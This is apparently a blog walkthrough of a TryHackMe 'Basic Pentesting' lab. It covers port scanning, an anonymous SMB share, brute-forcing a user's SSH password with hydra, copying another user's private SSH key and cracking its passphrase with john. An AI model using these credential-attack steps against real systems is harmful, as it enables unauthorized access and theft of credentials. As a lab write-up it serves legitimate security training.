Skip to content
leftermv.com
Terminal window
# PLATFORM          . THM
# CTF NAME          . Basic Pentesting
# DESCRIPTION       . This is a machine that allows you to practise web app hacking and privilege escalation
# DIFFICULTY        . Easy
# CTF LINK          . https://tryhackme.com/room/basicpentestingjt
  • I’ve started scanning the target machine to get a better understanding about the environment.
Terminal window
sudo nmap -sSVC -T5 10.10.245.193 -p- -oN ~/workspace/ctf_workspace/basicpt
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
|   256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_  256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)


80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).


139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS


8080/tcp open  http        Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2023-11-17T07:33:09-05:00
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
|   date: 2023-11-17T12:33:09
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

  • While the scan was running, I’ve checked if there’s a webserver running on :80 and there was one.

  • However, not much information is given to us.

Undergoing maintenance
Please check back later
  • Checking the source code, we get another piece of information
<!-- Check our dev note section if you need to know what to work on. -->

  • This made me try navigating to /dev or /development. The latter was working.

  • The content of this page is two files, dev.txt and j.txt.

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm  using version 2.5.12, because other versions were giving me trouble. -K


2018-04-22: SMB has been configured. -K


2018-04-21: I got Apache set up. Will put in our content later. -J
For J:


I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.


-K

  • From these two notes, we get valuable information.

  • From dev.txt, we find out that the webserver is using Apache and that the SMB has been configured on the host alongside with some piece of software that we’re not sure if it’s installed on our target or not.

  • On the other side, j.txt reveals that the j has a really weak password ; (or had, in case it was changed in the meanwhile)

  • Going back to our nmap scan, the most attractive thing to me was the SMB server ;

  • I’ve checked for possible shares using

Terminal window
smbclient -L \\10.10.245.193

and anonymous as a password when asked.

  Sharename       Type      Comment
  ---------       ----      -------
  Anonymous       Disk
  IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)

  • There’s a share called Anonymous;

  • Can connect to it using smbclient \\\\10.10.245.193\\Anonymous with anonymous as password.

smb: \> ls
  .                                   D        0  Thu Apr 19 20:31:20 2018
  ..                                  D        0  Thu Apr 19 20:13:06 2018
  staff.txt                           N      173  Thu Apr 19 20:29:55 2018


    14318640 blocks of size 1024. 11093564 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> exit
Announcement to staff:


PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!)


-Kay

  • This file is important ; it reveals us the 2 users from the notes above, jan and kay.

  • Since we already know Jan's password is weak, let’s try bruteforcing the SSH for this user.

Terminal window
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.245.193 ssh

NOTE: it takes ~10 minutes to find the password.

  • Once we find the password, we’re able to ssh to the box.

  • I have looked around and tried different manual enumaration / looked for privilege escalation.

  • By using cat /etc/passwd | cut -d ":" -f 1 I’ve noticed that the only 2 users available on the system are jan and kay.

  • I tried to navigate to /home/kay and I’ve noticed that besides the pass.bak file that I couldn’t read, I could navigate to .ssh and read the id_rsa key.

  • With the key copied to my machine, I have tried SSHing to the box using kay’s key chmod 600 id_rsa && ssh -i id_rsa kay@ip but I have been asked for a passphase.

  • I’ve used python3 /opt/john/run/ssh2john id_rsa > id_rsa.hash to format the file to something john can handle and then ran john --wordlist=/usr/share/wordlists/rockyou.txt against the file, revealing beeswax as the passphrase.

  • After being able to SSH in as kay, I was able to read the pass.bak file from his home, which revealed the final flag.